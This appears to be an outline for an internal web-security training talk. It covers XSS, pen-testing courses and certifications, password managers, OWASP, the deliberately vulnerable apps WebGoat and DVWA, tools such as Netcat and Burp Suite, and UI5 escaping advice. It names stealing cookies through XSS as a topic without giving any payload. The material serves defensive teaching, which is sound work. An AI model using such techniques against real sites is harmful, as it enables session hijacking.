{:.no_toc}
{:.no_toc}
- A markdown unordered list which will be replaced with the ToC, excluding the "Contents header" from above {:toc}
To understand the most common threats to web application security and what you can do to reduce the risk of your site being hacked.
- 2018-11-26 Malicious code found in npm package event-stream downloaded 8 million times in the past 2.5 months
- 2018-12-25 Ant Design Christmas Easter egg
- 2016-07-20 Wooyun.com was shutdown
- Anyone who majored in the Information Security when at school?
- Anyone who have exploited XSS vulnerability?
- Anyone who have installed Kali Linux?
- Anyone who have rooted your Android devices, break-jailed your iOS devices?
- Is there any chances that you can get back your Windows log-in password if you forget them?
- Any experiences of dealing with security issues/incidents?
- Exploit XSS vulnerability to steal cookies
- Solution proposal for authorization check in anonymous applications
- Upload limitation in anonymous applications
- Sanitizing/Removing the
<script>tag: https://sapjira.wdf.sap.corp/browse/KNGMHM02-11871 - Security Vulnerability auditing reports by third-party auditor
- Michael Solomon: CompTIA PenTest+
- Mike Chapple: CISM Cert, SSCP Cert, CompTIA CySA+, CISSP, CompTIA Security+
- Malcolm Shore: Penetration Testing,
Overview of web security, including Web Socket protocal
What is Pen test, basic bash scripting, Python, Kali ...
- Watch this course
- Use a password manager
- Stores a passwords for a different sites
- Fills in passwords on websites
- Store secure notes
- Generate strong passwords, etc.
- Secure all passwords with one master password
- LastPass, KeePass, 1Password, etc.
- Most can sync passwords between computers (browser extensions) and devices (android/ios app)
- OWASP(Open Web Application Security Project) Top 10
- XSS Prevention Checklist
- Excess XSS
- WebGoat
- WebGoat is a deliberately insecure web application (Java)
- https://github.com/WebGoat/WebGoat
- DVWA
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- http://www.dvwa.co.uk/
- Nmap, Netcat, tcpdump, netstat ...
- Kali Linux
- Vega Scanner
- Burp Suite
- ZAP
- ...
- ISC^2 Certifications https://www.isc2.org/Certifications
- CompTIA Certifications https://certification.comptia.org/certifications?level=cybersecurity
- CompTIA CySA+
- CompTIA CASP+: Advanced Security Practitioner
- CompTIA PenTest+
- ISACA Certification http://www.isaca.org/Certification/Pages/default.aspx
- Cicso
- How XSS works? As a result, XSS can hijack the session id
- DOM-based XSS: no server involved
- Manipulated Network request: client -> server -> client
- URL params / input
- Solution
- Output encoding as string, rather than JavaScript code
- Input Validation
- Secure Libraries
-
Nearly all UI5 standard controls automatically do proper escaping. Application developers do not have to care about output encoding in these UI5 standard controls
-
Exceptions to the rule: No escaping is done for SAP UI5 controls that allow embedding and rendering HTML:
<sap.ui.richtexteditor.RichTextEditor><sap.ui.core.HTML>